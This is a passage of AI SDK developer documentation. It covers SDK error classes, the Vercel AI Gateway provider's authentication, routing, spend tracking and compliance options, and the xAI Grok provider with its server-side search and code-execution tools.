Properties

reason: The reason for the retry failure
lastError: The most recent error that occurred during retries
errors: Array of all errors that occurred during retry attempts
message: The error message

Checking for this Error

You can check if an error is an instance of AI_RetryError using:

import { RetryError } from 'ai';

if (RetryError.isInstance(error)) {
  // Handle the error
}

title: AI_TooManyEmbeddingValuesForCallError description: Learn how to fix AI_TooManyEmbeddingValuesForCallError

AI_TooManyEmbeddingValuesForCallError

This error occurs when too many values are provided in a single embedding call.

Properties

provider: The AI provider name
modelId: The ID of the embedding model
maxEmbeddingsPerCall: The maximum number of embeddings allowed per call
values: The array of values that was provided

Checking for this Error

You can check if an error is an instance of AI_TooManyEmbeddingValuesForCallError using:

import { TooManyEmbeddingValuesForCallError } from 'ai';

if (TooManyEmbeddingValuesForCallError.isInstance(error)) {
  // Handle the error
}

title: ToolCallRepairError description: Learn how to fix AI SDK ToolCallRepairError

ToolCallRepairError

This error occurs when there is a failure while attempting to repair an invalid tool call. This typically happens when the AI attempts to fix either a NoSuchToolError or InvalidToolInputError.

Properties

originalError: The original error that triggered the repair attempt (either NoSuchToolError or InvalidToolInputError)
message: The error message
cause: The underlying error that caused the repair to fail

Checking for this Error

You can check if an error is an instance of ToolCallRepairError using:

import { ToolCallRepairError } from 'ai';

if (ToolCallRepairError.isInstance(error)) {
  // Handle the error
}

title: AI_TypeValidationError description: Learn how to fix AI_TypeValidationError

AI_TypeValidationError

This error occurs when type validation fails.

Properties

value: The value that failed validation
message: The error message including validation details

Checking for this Error

You can check if an error is an instance of AI_TypeValidationError using:

import { TypeValidationError } from 'ai';

if (TypeValidationError.isInstance(error)) {
  // Handle the error
}

title: AI_UnsupportedFunctionalityError description: Learn how to fix AI_UnsupportedFunctionalityError

AI_UnsupportedFunctionalityError

This error occurs when functionality is not unsupported.

Properties

functionality: The name of the unsupported functionality
message: The error message

Checking for this Error

You can check if an error is an instance of AI_UnsupportedFunctionalityError using:

import { UnsupportedFunctionalityError } from 'ai';

if (UnsupportedFunctionalityError.isInstance(error)) {
  // Handle the error
}

title: AI Gateway description: Learn how to use the AI Gateway provider with the AI SDK.

AI Gateway Provider

The AI Gateway provider connects you to models from multiple AI providers through a single interface. Instead of integrating with each provider separately, you can access OpenAI, Anthropic, Google, Meta, xAI, and other providers and their models.

Features

Access models from multiple providers without having to install additional provider modules/dependencies
Use the same code structure across different AI providers
Switch between models and providers easily
Automatic authentication when deployed on Vercel
View pricing information across providers
Observability for AI model usage through the Vercel dashboard

Setup

The Vercel AI Gateway provider is part of the AI SDK.

Basic Usage

For most use cases, you can use the AI Gateway directly with a model string:

// use plain model string with global provider
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Hello world",
});

// use provider instance (requires version 5.0.36 or later)
import { generateText, gateway } from "ai";

const { text } = await generateText({
  model: gateway("openai/gpt-5.4"),
  prompt: "Hello world",
});

The AI SDK automatically uses the AI Gateway when you pass a model string in the creator/model-name format.

Provider Instance

You can also import the default provider instance gateway from ai:

import { gateway } from "ai";

You may want to create a custom provider instance when you need to:

Set custom configuration options (API key, base URL, headers)
Use the provider in a provider registry
Wrap the provider with middleware
Use different settings for different parts of your application

To create a custom provider instance, import createGateway from ai:

import { createGateway } from "ai";

const gateway = createGateway({
  apiKey: process.env.AI_GATEWAY_API_KEY ?? "",
});

You can use the following optional settings to customize the AI Gateway provider instance:

baseURL string

Use a different URL prefix for API calls. The default prefix is https://ai-gateway.vercel.sh/v1/ai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the AI_GATEWAY_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
metadataCacheRefreshMillis number

How frequently to refresh the metadata cache in milliseconds. Defaults to 5 minutes (300,000ms).

Authentication

The Gateway provider supports two authentication methods:

API Key Authentication

Set your API key via environment variable:

AI_GATEWAY_API_KEY=your_api_key_here

Or pass it directly to the provider:

import { createGateway } from "ai";

const gateway = createGateway({
  apiKey: "your_api_key_here",
});

OIDC Authentication (Vercel Deployments)

When deployed to Vercel, the AI Gateway provider supports authenticating using OIDC (OpenID Connect) tokens without API Keys.

How OIDC Authentication Works

In Production/Preview Deployments:
- OIDC authentication is automatically handled
- No manual configuration needed
- Tokens are automatically obtained and refreshed
In Local Development:
- First, install and authenticate with the Vercel CLI
- Run vercel env pull to download your project's OIDC token locally
- For automatic token management:
  - Use vercel dev to start your development server - this will handle token refreshing automatically
- For manual token management:
  - If not using vercel dev, note that OIDC tokens expire after 12 hours
  - You'll need to run vercel env pull again to refresh the token before it expires

Read more about using OIDC tokens in the Vercel AI Gateway docs.

Bring Your Own Key (BYOK)

You can connect your own provider credentials to use with Vercel AI Gateway. This lets you use your existing provider accounts and access private resources.

To set up BYOK, add your provider credentials in your Vercel team's AI Gateway settings. Once configured, AI Gateway automatically uses your credentials. No code changes are needed.

Learn more in the BYOK documentation.

Language Models

You can create language models using a provider instance. The first argument is the model ID in the format creator/model-name:

import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Explain quantum computing in simple terms",
});

AI Gateway language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Available Models

The AI Gateway supports models from OpenAI, Anthropic, Google, Meta, xAI, Mistral, DeepSeek, Amazon Bedrock, Cohere, Perplexity, Alibaba, and other providers.

For the complete list of available models, see the AI Gateway documentation.

Dynamic Model Discovery

You can discover available models programmatically:

import { gateway, generateText } from "ai";

const availableModels = await gateway.getAvailableModels();

// List all available models
availableModels.models.forEach((model) => {
  console.log(`${model.id}: ${model.name}`);
  if (model.description) {
    console.log(`  Description: ${model.description}`);
  }
  if (model.pricing) {
    console.log(`  Input: $${model.pricing.input}/token`);
    console.log(`  Output: $${model.pricing.output}/token`);
    if (model.pricing.cachedInputTokens) {
      console.log(
        `  Cached input (read): $${model.pricing.cachedInputTokens}/token`,
      );
    }
    if (model.pricing.cacheCreationInputTokens) {
      console.log(
        `  Cache creation (write): $${model.pricing.cacheCreationInputTokens}/token`,
      );
    }
  }
});

// Use any discovered model with plain string
const { text } = await generateText({
  model: availableModels.models[0].id, // e.g., 'openai/gpt-5.4'
  prompt: "Hello world",
});

Credit Usage

You can check your team's current credit balance and usage:

import { gateway } from "ai";

const credits = await gateway.getCredits();

console.log(`Team balance: ${credits.balance} credits`);
console.log(`Team total used: ${credits.total_used} credits`);

The getCredits() method returns your team's credit information based on the authenticated API key or OIDC token:

balance number - Your team's current available credit balance
total_used number - Total credits consumed by your team

Generation Lookup

Look up detailed information about a specific generation by its ID, including cost, token usage, latency, and provider details. Generation IDs are available in providerMetadata.gateway.generationId on both generateText and streamText responses.

When streaming, the generation ID is injected on the first content chunk, so you can capture it early in the stream without waiting for completion. This is especially useful in cases where a network interruption or mid-stream error could prevent you from receiving the final response — since the gateway records the final status server-side, you can use the generation ID to look up the results (including cost, token usage, and finish reason) later via getGenerationInfo().

import { gateway, generateText } from 'ai';

// Make a request
const result = await generateText({
  model: gateway('anthropic/claude-sonnet-4'),
  prompt: 'Explain quantum entanglement briefly',
});

// Get the generation ID from provider metadata
const generationId = result.providerMetadata?.gateway?.generationId;

// Look up detailed generation info
const generation = await gateway.getGenerationInfo({ id: generationId });

console.log(`Model: ${generation.model}`);
console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
console.log(`Latency: ${generation.latency}ms`);
console.log(`Prompt tokens: ${generation.promptTokens}`);
console.log(`Completion tokens: ${generation.completionTokens}`);

With streamText, you can capture the generation ID from the first chunk via fullStream:

import { gateway, streamText } from 'ai';

const result = streamText({
  model: gateway('anthropic/claude-sonnet-4'),
  prompt: 'Explain quantum entanglement briefly',
});

let generationId: string | undefined;

for await (const part of result.fullStream) {
  if (!generationId && part.providerMetadata?.gateway?.generationId) {
    generationId = part.providerMetadata.gateway.generationId as string;
    console.log(`Generation ID (early): ${generationId}`);
  }
}

// Look up cost and usage after the stream completes
if (generationId) {
  const generation = await gateway.getGenerationInfo({ id: generationId });
  console.log(`Cost: $${generation.totalCost.toFixed(6)}`);
  console.log(`Finish reason: ${generation.finishReason}`);
}

The getGenerationInfo() method accepts:

id string - The generation ID to look up (format: gen_<ulid>, required)

It returns a GatewayGenerationInfo object with the following fields:

id string - The generation ID
totalCost number - Total cost in USD
upstreamInferenceCost number - Upstream inference cost in USD (relevant for BYOK)
usage number - Usage cost in USD (same as totalCost)
createdAt string - ISO 8601 timestamp when the generation was created
model string - Model identifier used
isByok boolean - Whether Bring Your Own Key credentials were used
providerName string - The provider that served this generation
streamed boolean - Whether streaming was used
finishReason string - Finish reason (e.g. 'stop')
latency number - Time to first token in milliseconds
generationTime number - Total generation time in milliseconds
promptTokens number - Number of prompt tokens
completionTokens number - Number of completion tokens
reasoningTokens number - Reasoning tokens used (if applicable)
cachedTokens number - Cached tokens used (if applicable)
cacheCreationTokens number - Cache creation input tokens
billableWebSearchCalls number - Number of billable web search calls

Examples

Basic Text Generation

import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Write a haiku about programming",
});

console.log(text);

Streaming

import { streamText } from "ai";

const { textStream } = await streamText({
  model: "openai/gpt-5.4",
  prompt: "Explain the benefits of serverless architecture",
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

Tool Usage

import { generateText, tool } from "ai";
import { z } from "zod";

const { text } = await generateText({
  model: "xai/grok-4",
  prompt: "What is the weather like in San Francisco?",
  tools: {
    getWeather: tool({
      description: "Get the current weather for a location",
      parameters: z.object({
        location: z.string().describe("The location to get weather for"),
      }),
      execute: async ({ location }) => {
        // Your weather API call here
        return `It's sunny in ${location}`;
      },
    }),
  },
});

Provider-Executed Tools

Some providers offer tools that are executed by the provider itself, such as OpenAI's web search tool. To use these tools through AI Gateway, import the provider to access the tool definitions:

import { generateText, stepCountIs } from "ai";
import { openai } from "@ai-sdk/openai";

const result = await generateText({
  model: "openai/gpt-5.4-mini",
  prompt: "What is the Vercel AI Gateway?",
  stopWhen: stepCountIs(10),
  tools: {
    web_search: openai.tools.webSearch({}),
  },
});

console.dir(result.text);

Gateway Tools

The AI Gateway provider includes built-in tools that are executed by the gateway itself. These tools can be used with any model through the gateway.

Perplexity Search

The Perplexity Search tool enables models to search the web using Perplexity's search API. This tool is executed by the AI Gateway and returns web search results that the model can use to provide up-to-date information.

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Search for news about AI regulations in January 2025.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt:
    "Search for news about AI regulations from the first week of January 2025.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch({
      maxResults: 5,
      searchLanguageFilter: ["en"],
      country: "US",
      searchDomainFilter: ["reuters.com", "bbc.com", "nytimes.com"],
    }),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

The Perplexity Search tool supports the following optional configuration options:

maxResults number

The maximum number of search results to return (1-20, default: 10).
maxTokensPerPage number

The maximum number of tokens to extract per search result page (256-2048, default: 2048).
maxTokens number

The maximum total tokens across all search results (default: 25000, max: 1000000).
searchLanguageFilter string[]

Filter search results by language using ISO 639-1 language codes (e.g., ['en'] for English, ['en', 'es'] for English and Spanish).
country string

Filter search results by country using ISO 3166-1 alpha-2 country codes (e.g., 'US' for United States, 'GB' for United Kingdom).
searchDomainFilter string[]

Limit search results to specific domains (e.g., ['reuters.com', 'bbc.com']). This is useful for restricting results to trusted sources.
searchRecencyFilter 'day' | 'week' | 'month' | 'year'

Filter search results by relative time period. Useful for always getting recent results (e.g., 'week' for results from the last week).

The tool works with both generateText and streamText:

import { gateway, streamText } from "ai";

const result = streamText({
  model: "openai/gpt-5.4-nano",
  prompt: "Search for the latest news about AI regulations.",
  tools: {
    perplexity_search: gateway.tools.perplexitySearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case "text-delta":
      process.stdout.write(part.text);
      break;
    case "tool-call":
      console.log("\nTool call:", JSON.stringify(part, null, 2));
      break;
    case "tool-result":
      console.log("\nTool result:", JSON.stringify(part, null, 2));
      break;
  }
}

Parallel Search

The Parallel Search tool enables models to search the web using Parallel AI's Search API. This tool is optimized for LLM consumption, returning relevant excerpts from web pages that can replace multiple keyword searches with a single call.

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Research the latest developments in quantum computing.",
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

You can also configure the search with optional parameters:

import { gateway, generateText } from "ai";

const result = await generateText({
  model: "openai/gpt-5.4-nano",
  prompt: "Find detailed information about TypeScript 5.0 features.",
  tools: {
    parallel_search: gateway.tools.parallelSearch({
      mode: "agentic",
      maxResults: 5,
      sourcePolicy: {
        includeDomains: ["typescriptlang.org", "github.com"],
      },
      excerpts: {
        maxCharsPerResult: 8000,
      },
    }),
  },
});

console.log(result.text);
console.log("Tool calls:", JSON.stringify(result.toolCalls, null, 2));
console.log("Tool results:", JSON.stringify(result.toolResults, null, 2));

The Parallel Search tool supports the following optional configuration options:

mode 'one-shot' | 'agentic'

Mode preset for different use cases:
- 'one-shot' - Comprehensive results with longer excerpts for single-response answers (default)
- 'agentic' - Concise, token-efficient results optimized for multi-step agentic workflows
maxResults number

Maximum number of results to return (1-20). Defaults to 10 if not specified.
sourcePolicy object

Source policy for controlling which domains to include/exclude:
- includeDomains - List of domains to include in search results
- excludeDomains - List of domains to exclude from search results
- afterDate - Only include results published after this date (ISO 8601 format)
excerpts object

Excerpt configuration for controlling result length:
- maxCharsPerResult - Maximum characters per result
- maxCharsTotal - Maximum total characters across all results
fetchPolicy object

Fetch policy for controlling content freshness:
- maxAgeSeconds - Maximum age in seconds for cached content (set to 0 for always fresh)

The tool works with both generateText and streamText:

import { gateway, streamText } from "ai";

const result = streamText({
  model: "openai/gpt-5.4-nano",
  prompt: "Research the latest AI safety guidelines.",
  tools: {
    parallel_search: gateway.tools.parallelSearch(),
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case "text-delta":
      process.stdout.write(part.text);
      break;
    case "tool-call":
      console.log("\nTool call:", JSON.stringify(part, null, 2));
      break;
    case "tool-result":
      console.log("\nTool result:", JSON.stringify(part, null, 2));
      break;
  }
}

Usage Tracking with User and Tags

Track usage per end-user and categorize requests with tags:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4",
  prompt: "Summarize this document...",
  providerOptions: {
    gateway: {
      user: "user-abc-123", // Track usage for this specific end-user
      tags: ["document-summary", "premium-feature"], // Categorize for reporting
    } satisfies GatewayProviderOptions,
  },
});

This allows you to:

View usage and costs broken down by end-user in your analytics
Filter and analyze spending by feature or use case using tags
Track which users or features are driving the most AI usage

Querying Spend Reports

Use the getSpendReport() method to query usage data programmatically. The reporting API is only available for Vercel Pro and Enterprise plans. For pricing, see the Custom Reporting docs.

import { gateway } from "ai";

const report = await gateway.getSpendReport({
  startDate: "2026-03-01",
  endDate: "2026-03-25",
  groupBy: "model",
});

for (const row of report.results) {
  console.log(`${row.model}: $${row.totalCost.toFixed(4)}`);
}

The getSpendReport() method accepts the following parameters:

startDate string - Start date in YYYY-MM-DD format (inclusive, required)
endDate string - End date in YYYY-MM-DD format (inclusive, required)
groupBy string - Aggregation dimension: 'day' (default), 'user', 'model', 'tag', 'provider', or 'credential_type'
datePart string - Time granularity when groupBy is 'day': 'day' or 'hour'
userId string - Filter to a specific user
model string - Filter to a specific model (e.g. 'anthropic/claude-sonnet-4.5')
provider string - Filter to a specific provider (e.g. 'anthropic')
credentialType string - Filter by 'byok' or 'system' credentials
tags string[] - Filter to requests matching these tags

Each row in results contains a grouping field (matching your groupBy choice) and metrics:

totalCost number - Total cost in USD
marketCost number - Market cost in USD
inputTokens number - Number of input tokens
outputTokens number - Number of output tokens
cachedInputTokens number - Number of cached input tokens
cacheCreationInputTokens number - Number of cache creation input tokens
reasoningTokens number - Number of reasoning tokens
requestCount number - Number of requests

You can combine tracking and querying to analyze spend by tags you defined:

import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { gateway, streamText } from 'ai';

// 1. Make requests with tags
const result = streamText({
  model: gateway('anthropic/claude-haiku-4.5'),
  prompt: 'Summarize this quarter's results',
  providerOptions: {
    gateway: {
      tags: ['team:finance', 'feature:summaries'],
    } satisfies GatewayProviderOptions,
  },
});

// 2. Later, query spend filtered by those tags
const report = await gateway.getSpendReport({
  startDate: '2026-03-01',
  endDate: '2026-03-31',
  groupBy: 'tag',
  tags: ['team:finance'],
});

for (const row of report.results) {
  console.log(`${row.tag}: $${row.totalCost.toFixed(4)} (${row.requestCount} requests)`);
}

Provider Options

The AI Gateway provider accepts provider options that control routing behavior and provider-specific configurations.

Gateway Provider Options

You can use the gateway key in providerOptions to control how AI Gateway routes requests:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain quantum computing",
  providerOptions: {
    gateway: {
      order: ["vertex", "anthropic"], // Try Vertex AI first, then Anthropic
      only: ["vertex", "anthropic"], // Only use these providers
    } satisfies GatewayProviderOptions,
  },
});

The following gateway provider options are available:

order string[]

Specifies the sequence of providers to attempt when routing requests. The gateway will try providers in the order specified. If a provider fails or is unavailable, it will move to the next provider in the list.

Example: order: ['bedrock', 'anthropic'] will attempt Amazon Bedrock first, then fall back to Anthropic.
only string[]

Restricts routing to only the specified providers. When set, the gateway will never route to providers not in this list, even if they would otherwise be available.

Example: only: ['anthropic', 'vertex'] will only allow routing to Anthropic or Vertex AI.
sort 'cost' | 'ttft' | 'tps'

Sorts available providers by a performance or cost metric before routing. The gateway will try the best-scoring provider first and fall back through the rest in sorted order. If unspecified, providers are ordered using the gateway's default system ranking.
- 'cost' — lowest cost first
- 'ttft' — lowest time-to-first-token first
- 'tps' — highest tokens-per-second first
When combined with order, the user-specified providers are promoted to the front while remaining providers follow the sorted order.

Example: sort: 'ttft' will route to the provider with the fastest time-to-first-token.

When sort is active, the response's providerMetadata.gateway.routing.sort object contains the sort option used, the resulting execution order, per-provider metric values, and any providers that were deprioritized.
models string[]

Specifies fallback models to use when the primary model fails or is unavailable. The gateway will try the primary model first (specified in the model parameter), then try each model in this array in order until one succeeds.

Example: models: ['openai/gpt-5.4-nano', 'gemini-3-flash-preview'] will try the fallback models in order if the primary model fails.
user string

Optional identifier for the end user on whose behalf the request is being made. This is used for spend tracking and attribution purposes, allowing you to track usage per end-user in your application.

Example: user: 'user-123' will associate this request with end-user ID "user-123" in usage reports.
tags string[]

Optional array of tags for categorizing and filtering usage in reports. Useful for tracking spend by feature, prompt version, or any other dimension relevant to your application.

Example: tags: ['chat', 'v2'] will tag this request with "chat" and "v2" for filtering in usage analytics.
byok Record<string, Array<Record<string, unknown>>>

Request-scoped BYOK (Bring Your Own Key) credentials to use for this request. When provided, any cached BYOK credentials configured in the gateway system are not considered. Requests may still fall back to use system credentials if the provided credentials fail.

Each provider can have multiple credentials (tried in order). The structure is a record where keys are provider slugs and values are arrays of credential objects.

Examples:
- Single provider: byok: { 'anthropic': [{ apiKey: 'sk-ant-...' }] }
- Multiple credentials: byok: { 'vertex': [{ projectId: 'proj-1', privateKey: '...' }, { projectId: 'proj-2', privateKey: '...' }] }
- Multiple providers: byok: { 'anthropic': [{ apiKey: '...' }], 'bedrock': [{ accessKeyId: '...', secretAccessKey: '...' }] }
zeroDataRetention boolean

Restricts routing requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.
disallowPromptTraining boolean

Restricts routing requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.
hipaaCompliant boolean

Restricts routing to models and tools from providers that have signed a BAA with Vercel for the use of AI Gateway (requires Vercel HIPAA BAA add on). BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.
quotaEntityId string

The unique identifier for the entity against which quota is tracked. Used for quota management and enforcement purposes.
providerTimeouts object

Per-provider timeouts for BYOK credentials in milliseconds. Controls how long to wait for a provider to start responding before falling back to the next available provider.

Example: providerTimeouts: { byok: { openai: 5000, anthropic: 2000 } }

For full details, see Provider Timeouts.

You can combine these options to have fine-grained control over routing and tracking:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Write a haiku about programming",
  providerOptions: {
    gateway: {
      order: ["vertex"], // Prefer Vertex AI
      only: ["anthropic", "vertex"], // Only allow these providers
    } satisfies GatewayProviderOptions,
  },
});

Model Fallbacks Example

The models option enables automatic fallback to alternative models when the primary model fails:

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "openai/gpt-5.4", // Primary model
  prompt: "Write a TypeScript haiku",
  providerOptions: {
    gateway: {
      models: ["openai/gpt-5.4-nano", "gemini-3-flash-preview"], // Fallback models
    } satisfies GatewayProviderOptions,
  },
});

// This will:
// 1. Try openai/gpt-5.4 first
// 2. If it fails, try openai/gpt-5.4-nano
// 3. If that fails, try gemini-3-flash-preview
// 4. Return the result from the first model that succeeds

Zero Data Retention Example

Set zeroDataRetention to true to route requests to providers that have zero data retention agreements with Vercel for AI Gateway. If there are no providers available for the model with zero data retention, the request will fail. When zeroDataRetention is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when zeroDataRetention is set to true to ensure that requests are only routed to providers that support ZDR compliance. Request-level ZDR is only available for Vercel Pro and Enterprise plans.

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this sensitive document...",
  providerOptions: {
    gateway: {
      zeroDataRetention: true,
    } satisfies GatewayProviderOptions,
  },
});

Disallow Prompt Training Example

Set disallowPromptTraining to true to route requests to providers that have agreements with Vercel for AI Gateway to not use prompts for model training. If there are no providers available for the model that disallow prompt training, the request will fail. When disallowPromptTraining is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when disallowPromptTraining is set to true to ensure that requests are only routed to providers that do not train on prompt data.

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this proprietary business data...",
  providerOptions: {
    gateway: {
      disallowPromptTraining: true,
    } satisfies GatewayProviderOptions,
  },
});

HIPAA Compliance Example

Set hipaaCompliant to true to route requests only to models or tools by providers that have signed a BAA with Vercel for the use of AI Gateway. If the model or tool does not have a HIPAA-compliant provider, the request will fail. When hipaaCompliant is false or not specified, there is no enforcement of restricting routing. BYOK credentials are skipped when hipaaCompliant is set to true to ensure that requests are only routed to providers that support HIPAA compliance.

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Analyze this patient data...",
  providerOptions: {
    gateway: {
      hipaaCompliant: true,
    } satisfies GatewayProviderOptions,
  },
});

Quota Entity ID Example

Set quotaEntityId to track and enforce quota against a specific entity. This is useful for multi-tenant applications where you need to manage quota at the entity level (e.g., per organization or team).

import type { GatewayProviderOptions } from "@ai-sdk/gateway";
import { generateText } from "ai";

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Summarize this report...",
  providerOptions: {
    gateway: {
      quotaEntityId: "org-123",
    } satisfies GatewayProviderOptions,
  },
});

Provider-Specific Options

When using provider-specific options through AI Gateway, use the actual provider name (e.g. anthropic, openai, not gateway) as the key:

import type { AnthropicProviderOptions } from '@ai-sdk/anthropic';
import type { GatewayProviderOptions } from '@ai-sdk/gateway';
import { generateText } from 'ai';

const { text } = await generateText({
  model: "anthropic/claude-sonnet-4.6",
  prompt: "Explain quantum computing",
  providerOptions: {
    gateway: {
      order: ["vertex", "anthropic"],
    } satisfies GatewayProviderOptions,
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    } satisfies AnthropicProviderOptions,
  },
});

This works with any provider supported by AI Gateway. Each provider has its own set of options - see the individual provider documentation pages for details on provider-specific options.

Available Providers

AI Gateway supports routing to 20+ providers.

For a complete list of available providers and their slugs, see the AI Gateway documentation.

Model Capabilities

Model capabilities depend on the specific provider and model you're using. For detailed capability information, see:

AI Gateway provider options for an overview of available providers
Individual AI SDK provider pages for specific model capabilities and features

title: xAI Grok description: Learn how to use xAI Grok.

xAI Grok Provider

The xAI Grok provider contains language model support for the xAI API.

Setup

The xAI Grok provider is available via the @ai-sdk/xai module. You can install it with

Provider Instance

You can import the default provider instance xai from @ai-sdk/xai:

import { xai } from '@ai-sdk/xai';

If you need a customized setup, you can import createXai from @ai-sdk/xai and create a provider instance with your settings:

import { createXai } from '@ai-sdk/xai';

const xai = createXai({
  apiKey: 'your-api-key',
});

You can use the following optional settings to customize the xAI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.x.ai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the XAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create xAI models using a provider instance. The first argument is the model id, e.g. grok-3.

const model = xai('grok-3');

By default, xai(modelId) uses the Chat API. To use the Responses API with server-side agentic tools, explicitly use xai.responses(modelId).

Example

You can use xAI language models to generate text with the generateText function:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai('grok-3'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

xAI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

Provider Options

xAI chat models support additional provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

const model = xai('grok-3-mini');

await generateText({
  model,
  providerOptions: {
    xai: {
      reasoningEffort: 'high',
    },
  },
});

The following optional provider options are available for xAI chat models:

reasoningEffort 'low' | 'medium' | 'high'

Reasoning effort for reasoning models.
store boolean

Whether to store the generation. Defaults to true.
previousResponseId string

The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.

Responses API (Agentic Tools)

You can use the xAI Responses API with the xai.responses(modelId) factory method for server-side agentic tool calling. This enables the model to autonomously orchestrate tool calls and research on xAI's servers.

const model = xai.responses('grok-4-fast');

The Responses API provides server-side tools that the model can autonomously execute during its reasoning process:

web_search: Real-time web search and page browsing
x_search: Search X (Twitter) posts, users, and threads
code_execution: Execute Python code for calculations and data analysis

Vision

The Responses API supports image input with vision models:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: xai.responses('grok-2-vision-1212'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        { type: 'image', image: fs.readFileSync('./image.png') },
      ],
    },
  ],
});

Web Search Tool

The web search tool enables autonomous web research with optional domain filtering and image understanding:

import { xai } from '@ai-sdk/xai';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: xai.responses('grok-4-fast'),
  prompt: 'What are the latest developments in AI?',
  tools: {
    web_search: xai.tools.webSearch({
      allowedDomains: ['arxiv.org', 'openai.com'],
      enableImageUnderstanding: true,
    }),
  },
});

console.log(text);
console.log('Citations:', sources);

Web Search Parameters

allowedDomains string[]

Only search within specified domains (max 5). Cannot be used with excludedDomains.
excludedDomains string[]

Exclude specified domains from search (max 5). Cannot be used with allowedDomains.
enableImageUnderstanding boolean

Enable the model to view and analyze images found during search. Increases token usage.

X Search Tool

The X search tool enables searching X (Twitter) for posts, with filtering by handles and date ranges:

const { text, sources } = await generateText({
  model: xai.responses('grok-4-fast'),
  prompt: 'What are people saying about AI on X this week?',
  tools: {
    x_search: xai.tools.xSearch({
      allowedXHandles: ['elonmusk', 'xai'],
      fromDate: '2025-10-23',
      toDate: '2025-10-30',
      enableImageUnderstanding: true,
      enableVideoUnderstanding: true,
    }),
  },
});

X Search Parameters

allowedXHandles string[]

Only search posts from specified X handles (max 10). Cannot be used with excludedXHandles.
excludedXHandles string[]

Exclude posts from specified X handles (max 10). Cannot be used with allowedXHandles.
fromDate string

Start date for posts in ISO8601 format (YYYY-MM-DD).
toDate string

End date for posts in ISO8601 format (YYYY-MM-DD).
enableImageUnderstanding boolean

Enable the model to view and analyze images in X posts.
enableVideoUnderstanding boolean

Enable the model to view and analyze videos in X posts.

Code Execution Tool

The code execution tool enables the model to write and execute Python code for calculations and data analysis:

const { text } = await generateText({
  model: xai.responses('grok-4-fast'),
  prompt:
    'Calculate the compound interest for $10,000 at 5% annually for 10 years',
  tools: {
